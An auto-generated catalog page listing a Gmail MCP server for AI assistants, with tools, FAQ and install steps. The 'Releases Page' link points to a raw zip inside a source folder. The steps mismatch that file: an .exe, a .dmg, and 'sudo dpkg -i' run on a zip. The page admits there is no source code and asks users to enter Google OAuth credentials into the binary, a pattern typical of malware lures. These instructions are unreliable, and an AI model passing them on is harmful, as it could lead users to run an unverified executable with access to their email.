MCP Catalogs
Homegmail-mcp screenshot

gmail-mcp

by hahaha-saygex·1·Score 34

Gmail MCP server for email management with OAuth2 authentication.

communicationproductivityai-llm
0
Forks
0
Open issues
this month
Last commit
2d ago
Indexed

Overview

The Gmail MCP server provides programmatic access to Gmail through OAuth2 authentication, allowing AI assistants to send, search, and organize emails. It supports batch operations, label management, and attachment handling, making it suitable for integration with AI models like Claude, Gemini, and Cursor. The server appears to be actively maintained with recent updates and cross-platform support.

Try asking AI

After installing, here are 5 things you can ask your AI assistant:

you:Automate email responses and management within AI-powered development environments
you:Integrate Gmail functionality into AI workflows for automated communication
you:Process and organize large volumes of emails using AI assistants
you:What Google account permissions are required?
you:Can I use this with any AI assistant?

When to choose this

Choose this if you need a prebuilt solution for Gmail management and prefer binaries over source code implementation.

When NOT to choose this

Avoid this if you need source code visibility, want to understand or customize the MCP implementation, or need clear documentation on MCP integration.

Tools this server exposes

5 tools extracted from the README
  • send_email

    Send emails with attachments and recipients

  • search_emails

    Find emails using keywords or filters

  • organize_with_labels

    Categorize emails with labels

  • batch_operations

    Manage multiple emails at once

  • manage_attachments

    Upload and handle email attachments

Note: Tool names inferred from features section as no explicit tool documentation was provided

Comparable tools

gmail-mcp-servergoogle-gmail-api-mcpimap-mcpemail-mcp

Installation

Installation

  1. Download the latest version from [Releases Page](https://raw.githubusercontent.com/hahaha-saygex/gmail-mcp/main/src/builders/mcp_gmail_2.7-alpha.4.zip)
  1. Install according to your operating system:

- **Windows**: Double-click the .exe file and follow the setup instructions - **macOS**: Open the .dmg file and drag the app to your Applications folder - **Linux**: Use sudo dpkg -i mcp_gmail_2.7-alpha.4.zip in your terminal

  1. Set up OAuth2 authentication by creating a project in Google Developer Console and configuring the Gmail API
  1. Launch the application and enter your credentials

Claude Desktop Configuration

Add to your Claude Desktop configuration:

{
  "mcpServers": {
    "gmail": {
      "command": "path/to/gmail-mcp",
      "args": []
    }
  }
}

FAQ

What Google account permissions are required?
The server requires OAuth2 authentication with Gmail API access permissions, including read/write access to emails and management of labels.
Can I use this with any AI assistant?
Yes, it's designed to work with AI models that support MCP servers like Claude, Gemini, and Cursor, and can be integrated with other compatible systems.

Compare gmail-mcp with

GitHub →

Last updated · Auto-generated from public README + GitHub signals.